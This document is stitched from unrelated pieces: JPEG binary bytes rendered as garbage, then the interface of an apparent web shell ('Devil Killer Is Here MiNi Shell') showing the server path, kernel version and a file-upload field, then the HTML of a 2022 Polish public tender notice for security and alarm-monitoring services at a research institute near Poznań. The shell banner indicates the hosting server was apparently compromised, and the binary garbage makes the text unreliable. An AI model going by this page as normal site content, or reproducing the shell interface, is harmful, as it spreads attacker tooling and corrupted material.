JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20221109/0043103601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług ochrony na potrzeby jednostek organizacyjnych Instytutu Włókien Naturalnych i Roślin Zielarskich – PIB w Plewiskach (k/Poznania) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">INSTYTUT WŁÓKIEN NATURALNYCH I ROŚLIN ZIELARSKICH - PAŃSTWOWY INSTYTUT BADAWCZY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 301027411</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wojska Polskiego 71B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">60-630</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">malgorzata.kaiser@iwnirz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.iwnirz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Badania naukowe i inna działalność </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług ochrony na potrzeby jednostek organizacyjnych Instytutu Włókien Naturalnych i Roślin Zielarskich – PIB w Plewiskach (k/Poznania) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-77a51a54-6012-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00431036</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Składanie ofert w postępowaniu (a także ich wycofanie) dopuszczone jest wyłącznie za pomocą narzędzia miniPortal, dostępnego na stronie https://miniportal.uzp.gov.pl (przy wykorzystaniu konta ePUAP dostęp do formularzy: złożenia, zmiany, wycofania oferty, a także do formularza komunikacji. Komunikacja pomiędzy Zamawiającym a Wykonawcą w sprawach innych niż składanie oferty będzie następować za pośrednictwem:<br/>1)	Poczty elektronicznej e-mail. Ze strony Zamawiającego jest to adres poczty elektronicznej <br/>(e-mail) malgorzata.kaiser@iwnirz.pl <br/>lub<br/>2)	Dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal (formularz komunikacji, o którym mowa powyżej), z tym że dokumenty elektroniczne lub elektroniczne kopie oświadczeń lub dokumentów są składane Zamawiającemu jako załączniki wskazanego formularza komunikacji,<br/>Szczegóły w zakresie komunikacji Zamawiającego z Wykonawcami podaje dział III ust. 8 i 9 SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Wykonawca zamierzający wziąć udział w niniejszym postępowaniu, musi posiadać konto <br/>na platformie ePUAP dostępnej na stronie https://epuap.gov.pl/wps/portal, co jest niezbędne do możliwości złożenia Zamawiającemu oferty stosownie do informacji podanej w sekcji III.3.5) ogłoszenia. <br/>2.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy użyciu środków, o których mowa ust. 1 i 2 powyżej opisane zostały w:<br/>1)	Regulaminie korzystania z systemu miniPortal, który jest do pobrania <br/>na stronie miniPortalu, o której mowa w ust. 2 powyżej (zakładka pn. „Instrukcje” dalej: plik pn. Instrukcja użytkownika systemu miniPortal-ePUAP)<br/>2)	Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP), które są dostępne na stronie internetowej, o wskazanej w ust. 1 powyżej (zakładka pn. „Pomoc” i pliki do pobrania tam wskazane. <br/>Poprzez uczestnictwo w niniejszym postępowaniu Wykonawca, akceptuje postanowienia wskazanej wyżej Instrukcji użytkownika systemu miniPortal oraz wyżej wskazanych warunków korzystania z ePUAP. <br/>3.	Maksymalny rozmiar plików przesyłanych za pośrednictwem wskazanych w ust. 1 powyżej dedykowanych formularzy do: złożenia, zmiany, wycofania oferty oraz formularza <br/>komunikacji wynosi 150 MB.<br/>4.	Wskazana w sekcji III.3.5) ogłoszenia poczta e-mail po stronie Zamawiającego jest standardową pocztą elektroniczną, zdolną do wysyłania i przyjmowania na nią plików <br/>(jednego załącznika lub suma załączników) o maksymalnym przetestowanym rozmiarze 36,7 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna RODO została podana w załączniku nr 1 SWZ (zob. również dział II SWZ)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z klauzulą informacyjną RODO (załącznik nr 1 SWZ)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TA/Zp-8/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem niniejszego zamówienia jest świadczenie dla Zamawiającego usług ochrony osób <br/>i mienia w odniesieniu do terenu (obszaru) zlokalizowanego przy ul. Kolejowej 2 w Plewiskach (gmina Komorniki k/Poznania), który stanowi jedną z jednostek organizacyjnych Zamawiającego. <br/>2.	Objęte przedmiotem zamówienia usługi ochrony wymagają wykonania poprzez:<br/>1)	Bezpośrednią ochronę fizyczną wykonywaną poprzez stałą obecność (straż, nadzór) pracownika/ pracowników ochrony na obszarze, o którym mowa w ust. 1 powyżej (Ochrona Strażnicza) przez wszystkie dni tygodnia od godz. 15.00 do godz. 7.00 dnia następnego, <br/>z zastrzeżeniem dodatkowych postanowień ust. 3 poniżej, dotyczących wskazanych tam dni; <br/>2)	Monitorowanie całodobowo (przez wszystkie dni tygodnia) sygnałów alarmowych pochodzących z obszaru ochrony, o którym mowa w ust. 1 powyżej (Monitoring Lokalnego Systemu Alarmowego), z zastrzeżeniem dodatkowych postanowień ust. 4 poniżej. <br/>3.	W przypadku sobót i dni ustawowo wolnych od pracy, a także dodatkowych dni wolnych <br/>od pracy u Zamawiającego Ochrona Strażnicza, o której mowa w ust. 2 pkt 1) powyżej wymagana jest całodobowo przez wskazane dni.<br/>4.	W zakres usług stanowiących przedmiot niniejszego zamówienia wchodzą również usługi dodatkowe, związane z wykonywaniem Monitoringu, o którym mowa w ust. 2 pkt 2) powyżej, tj.:<br/>1)	Usługi zabezpieczenia technicznego w zakresie polegającym w szczególności <br/>na uruchomieniu na obszarze ochrony, o którym mowa w ust. 1 i 2 powyżej odpowiedniego elektronicznego systemu do transmisji i odbioru sygnałów alarmowych <br/>(Lokalny System Alarmowy – skrót. LSA), a także utrzymywanie sprawności <br/>tak uruchomionego systemu (w tym poprzez jego bieżącą konserwację i naprawy);<br/>2)	Wykonywanie ochrony fizycznej doraźnej (interwencyjnej) poprzez utrzymywanie <br/>całodobowo w gotowości do natychmiastowego wysłania na obszar ochrony, o którym mowa w ust. 1 i 2 powyżej kwalifikowanych pracowników ochrony (patrolu lub patroli interwencyjnych) oraz w ramach wskazanej gotowości wysłanie - w reakcji, <br/>na wezwanie/sygnał o zagrożeniu osób lub mienia na tym obszarze - patrolu/patroli interwencyjnych i wykonania tam w razie potrzeby przez ten patrol/patrole Interwencyjne koniecznej ochrony fizycznej lub innego rodzaju zabezpieczenia osób lub mienia.<br/>5.	Szczegółowo przedmiot zamówienia i warunki jego wykonania, w tym obowiązki Wykonawcy realizującego zamówienie – podaje SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79711000-1 - Usługi nadzoru przy użyciu alarmu</p> <p class="mb-0">79713000-5 - Usługi strażnicze</p> <p class="mb-0">79714000-2 - Usługi w zakresie nadzoru</p> <p class="mb-0">79715000-9 - Usługi patrolowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie niniejszego zamówienia ubiegać się mogą Wykonawcy, którzy spełniają określony<br/> w ramach w art. 112 ust. 1 pkt 2 ustawy PZP warunek polegający na tym, że posiadają uprawnienia do prowadzenia działalności w zakresie usług ochrony osób i mienia w rozumieniu ustawy z dnia 22.08.1997 o ochronie osób i mienia, tj. aktualną koncesję, o której mowa <br/>art. 15 ust. 1 wyżej wskazanej ustawy z dnia 22.08.1997 o ochronie osób i mienia, z której wynikać będzie uprawnieninie Wykonawcy do prowadzenia działalności gospodarczej usług ochrony osób i mienia minimum na obszarze pozwalającym na realizację przedmiotu niniejszego zamówienia w zakresie dotyczącym świadczeń wymagających takiej koncesji. W przypadku Wykonawców, o których mowa w art. 58 ustawy PZP (Wykonawców wspólnie ubiegających <br/>się o zamówienie) wskazany wyżej warunek powinien spełniać minimum jeden z Wykonawców, Wykonawców, który będzie wykonywał czynności, dla których wymagane jest ww. koncesja.<br/>2.	O udzielenie niniejszego zamówienia ubiegać się mogą Wykonawcy, którzy spełniają określony <br/>w art. 112 ust. 2 pkt 4 ustawy PZP warunek dotyczący zdolności zawodowej do należytego wykonania niniejszego zamówienia, tj. wykażą Zamawiającemu, że dysponują odpowiednim, <br/>tj. na poziomie określonym w ust. 3 poniżej, doświadczeniem zawodowym.<br/>3.	Przy uwzględnieniu dodatkowych postanowień ust. 4 i 5 poniżej, Zamawiający uzna wskazany w ust 2 powyżej warunek udziału w niniejszym postępowaniu za spełniony, jeżeli Wykonawca wykaże Zamawiającemu fakt wykonania dwóch usług (każda zwana dalej jako „USŁUGA”), spełniających dodatkowo następujące cechy:<br/>1)	Każda z dwóch USŁUG została wykonana (ukończona) w okresie ostatnich trzech lat przed upływem terminu składania ofert w niniejszym postępowaniu (a jeżeli okres prowadzenia działalności przez Wykonawcę jest krótszy niż trzy lata, to w tym okresie). Powyższe wymaganie w niniejszym punkcie nie dotyczy USŁUGI/USŁUG, <br/>które są w trakcie wykonywania;<br/>2)	Przedmiotem jednej z dwóch USŁUG, o których mowa w pkt 1) powyżej <br/>było wykonanie (a w przypadku, gdy USŁUGA - jest nadal wykonywana – jest wykonywanie) usług ochrony mienia minimum w formie bezpośredniej ochrony fizycznej budynków przeznaczonych do pracy lub zamieszkania przez ludzi, realizowane przez okres nie krótszy niż 10 miesięcy (słownie: dziesięć miesięcy), <br/>przy czym w przypadku USŁUGI/USŁUG nadal wykonywanych – wskazane wyżej wykonywanie bezpośredniej ochrony fizycznej muszą również stanowić przedmiot już wykonanej części nadal realizowanej USŁUGI/USŁUG a okres tego stanu wykonywania (świadczenia) USŁUGI w zakresie bezpośredniej ochrony fizycznej również nie może być krótszy niż 10 miesięcy;<br/>3)	Przedmiotem drugiej z dwóch USŁUG, o których mowa w pkt 1) powyżej było wykonanie (a w przypadku, gdy USŁUGA - jest nadal wykonywana – jest wykonywanie) usług ochrony mienia minimum w formie stałego dozoru sygnałów przesyłanych, gromadzonych lub przetwarzanych w elektronicznych urządzeniach i systemach alarmowych, realizowane przez okres nie krótszy niż 10 miesięcy (słownie: dziesięć miesięcy), przy czym w przypadku USŁUGI/USŁUG nadal wykonywanych – wskazane wyżej wykonywanie stałego dozoru sygnałów przesyłanych, gromadzonych <br/>i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych muszą również stanowić przedmiot już wykonanej części nadal realizowanej USŁUGI/USŁUG <br/>w zakresie stałego dozoru sygnałów przesyłanych, gromadzonych i przetwarzanych <br/>w elektronicznych urządzeniach i systemach alarmowych również nie może być krótszy niż 10 miesięcy. <br/>4)	Łączna wartość obu USŁUG, o których mowa w pkt 1) – 3) powyżej była o wartości <br/>(tj. całkowitej kwocie zapłaty z tytułu wykonania umów mającej za przedmiot obie USŁUGI) nie mniejszej niż 500 000 zł (słownie: pięćset tysięcy złotych) netto (bez podatku VAT), przy czym minimalna wartość dla każdej z USŁUGU (całkowita kwota zapłaty z tytułu wykonania umowy mającej za przedmiot daną USŁUGĘ) nie może być niższa niż 30 000 zł netto (bez podatku VAT). W przypadku, gdy przedstawiana <br/>do wykazania spełnienia warunku USŁUGA jest/ obie USŁUGI są nadal wykonywane wskazana wyżej wartość łączna 500 000 zł netto z obu USŁUG (jak też minimalna wartość – 30 000 zł netto – dla każdej USŁUGI) dotyczy USŁUGI/USŁUG <br/>w części już wykonanej. <br/>5)	Każda z dwóch USŁUG, o których mowa w pkt 1) – 4) powyżej została wykonana należycie (a w przypadku USŁUG wykonywanych – jest wykonywana należycie). <br/>4.	Z zastrzeżeniem wyjątku dopuszczonego w ust. 5 pkt 1) poniżej, USŁUGI wymagane <br/>na podstawie ust. 3 powyżej muszą być USŁUGAMI wykonanymi/wykonywanymi <br/>przez Wykonawcę (Wykonawca ten bezpośrednio uczestniczył w wykonaniu/uczestniczy <br/>w wykonywaniu danej USŁUGI), z tym że w przypadku Wykonawców, o których mowa <br/>w art. 58 ustawy PZP (Wykonawców wspólnie ubiegających się o zamówienie) powyższy wymóg może być też spełniony łącznie przez Wykonawców wspólnie ubiegających się o zamówienie.<br/>5.	Stosownie do postanowień art. 118 ust. 1 ustawy PZP Wykonawca - w celu potwierdzenia spełniania wskazanego w ust. 3 powyżej warunku udziału w niniejszym postępowaniu - może polegać na zdolnościach zawodowych innego podmiotu/podmiotów (dalej zwanego „PODMIOTEM TRZECIM”) niezależnie od charakteru prawnego łączących Wykonawcę z nim stosunków prawnych, pod warunkiem, że Wykonawca taki wykaże Zamawiającemu, że realizując zamówienie stanowiące przedmiot niniejszego postępowania będzie dysponował niezbędnymi zasobami PODMIOTU TRZECIEGO. W takim przypadku wymagane będzie również spełnienie następujących warunków łącznie:<br/>1)	Ta USŁUGA/USŁUGI spośród wymaganych na podstawie ust. 3 powyżej, które <br/>są przywoływane jako wykonane (a w przypadku, gdy USŁUGA jest nadal wykonywana – są przywoływane jako wykonywane) przez dany PODMIOT TRZECI (w celu wykazywania spełnienia określonego w ust. 3 powyżej działu warunku udziału w niniejszym postępowaniu) – będą wykonane/wykonywane przez ten PODMIOT TRZECI (jako podmiot, który bezpośrednio uczestniczył/uczestniczy w wykonaniu/wykonywaniu danej USŁUGI/USŁUG);<br/>2)	Dany PODMIOT TRZECI, na którego zdolności powołuje się Wykonawca <br/>przy wykazywaniu spełnienia określonego w ust. 3 powyżej warunku udziału <br/>w niniejszym postępowaniu musi (na podstawie art. 118 ust. 2 ustawy PZP) być tym podmiotem (PODMIOTEM TRZECIM), który wykonana usługi ochrony stanowiące przedmiot niniejszego zamówienia - minimum w zakresie czynności (świadczeń), jaki odpowiada świadczeniom (usługom ochrony) wymaganym dla danej USŁUGI <br/>z ust. 3 pkt 2) lub USŁUGI z ust. 3 pkt 4) powyżej - odpowiednio do tego, którą/które zostaną przedstawione jako USŁUGA/ USŁUGI wykonane (a w przypadku, gdy USŁUGA - jest nadal wykonywana – zostaną przedstawione jako wykonywane) przez ten PODMIOT TRZECI;<br/>3)	W stosunku do PODMIOTU TRZECIEGO, o którym mowa w pkt 1) i 2) powyżej, <br/>na którego zdolności powołuje się Wykonawca przy wykazywaniu spełnienia określonego w ust. 3 powyżej warunku udziału w niniejszym postępowaniu nie będą zachodzić podstawy wykluczenia z art. 108 ust. 1 ustawy PZP oraz art. 7 ust. 1 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. 2022 poz. 835)<br/>4)	Informacja o zamiarze powołania na zasoby (wykonaną USŁUGĘ/USŁUGI) PODMIOTU TRZECIEGO przy wykazywaniu określonego w ust. 3 powyżej spełnienia warunku udziału <br/>w niniejszym postępowaniu musi zostać zakomunikowana Zamawiającemu nie później <br/>niż w terminie składania ofert.<br/>6.	W kwestiach nieuregulowanych powyżej w niniejszym dziale, ocena spełnienia określonego tam warunku udziału w niniejszym postępowaniu następuje zgodnie z ustawą PZP oraz SWZ, <br/>w tym poprzez podmiotowe środki dowodowe, o których mowa sekcji V.5.7) ogłoszenia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Dowody na okoliczność, że Wykonawca spełnił łącznie przesłanki, o których mowa w art. 110 ust. 2 ustawy PZP – przy czym tylko w przypadku, gdy w odniesieniu do Wykonawcy składającego ofertę <br/>(a w przypadku Oferty wspólnej składanej przez Wykonawców wspólnie ubiegających się o zamówienie (o których mowa w art. 58 ustawy PZP), w odniesieniu do tego Wykonawcy, do którego) ma miejsce sytuacja, o której mowa w art. 110 ust. 2 ustawy PZP w zakresie podstaw wykluczenia, o których mowa w art. 108 ust. 1 pkt 1, 2 i 5 ustawy PZP</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Zobowiązanie PODMIOTU TRZECIEGO do oddania Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy, potwierdzający, że Wykonawca realizując niniejsze zamówienie będzie dysponował niezbędnymi zasobami tego podmiotu - przy czym tylko w przypadku, gdy Wykonawca, który, stosownie do sekcji V.5.4.) ust. 5 ogłoszenia, przy wykazywaniu spełnienia określonego w V.5.4.) ust. 3 ogłoszenia warunku udziału w niniejszym postępowaniu powołuje się na zasoby wskazanego tam PODMIOTU TRZECIEGO. Dalsze szczegóły dział IX ust. 9 SWZ <br/>2.	Oświadczenie, o którym mowa w art. 117 ust. 4 ustawy PZP, z którego będzie wynikać, które usługi spośród stanowiących przedmiot niniejszego zamówienia wykonają poszczególni Wykonawcy wspólnie ubiegający się o zamówienie – przy czym tylko w przypadku, gdy spełnienie określonego w sekcji V.5.4.) ust. 3 ogłoszenia warunku udziału w niniejszym postępowaniu opiera się na zdolnościach Wykonawców wspólnie ubiegających się o 